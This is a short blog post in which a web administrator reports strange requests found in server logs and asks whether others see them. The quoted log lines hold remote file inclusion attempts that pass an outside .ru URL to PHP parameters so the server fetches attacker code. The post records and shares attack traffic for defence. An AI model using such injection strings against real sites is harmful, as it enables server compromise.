Strange Entry on webserver log file new warm or virus?
Today I found some strange activity and request on a web server log. I decided to discover the request pattern. Then I check some of different website log on same and different web server. Seems there is any new warm or virus spreading in world... Some Entry from web log:
"GET /filter-news/index.php?v=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 69305 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /detail/index.php?pageNum_RsFooterNews=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 65360 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /filter-news/index.php?v=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 69305 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /filter-news/index.php?v=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 68900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /detail/index.php?pageNum_RsFooterNews=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 65360 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
And a lot of entry that requesting on some PHP script to collect various HTTP:// URL. Request coming from different IP address, requesting different .php files/scripts and different HTTP URL. The interesting thing is all the URL is having domain .RU TLD.
This type of request on web server is creating high load on CPU usages on server. I have seen a lot of request of this kind, on different server, different web site, different location.
Any one having this problem ? I am sure you have. Check your web server log and tell me the story....
Thanks
Ahamed Bauani
0 Comments:
Post a Comment
Links to this post:
Create a Link
<< Home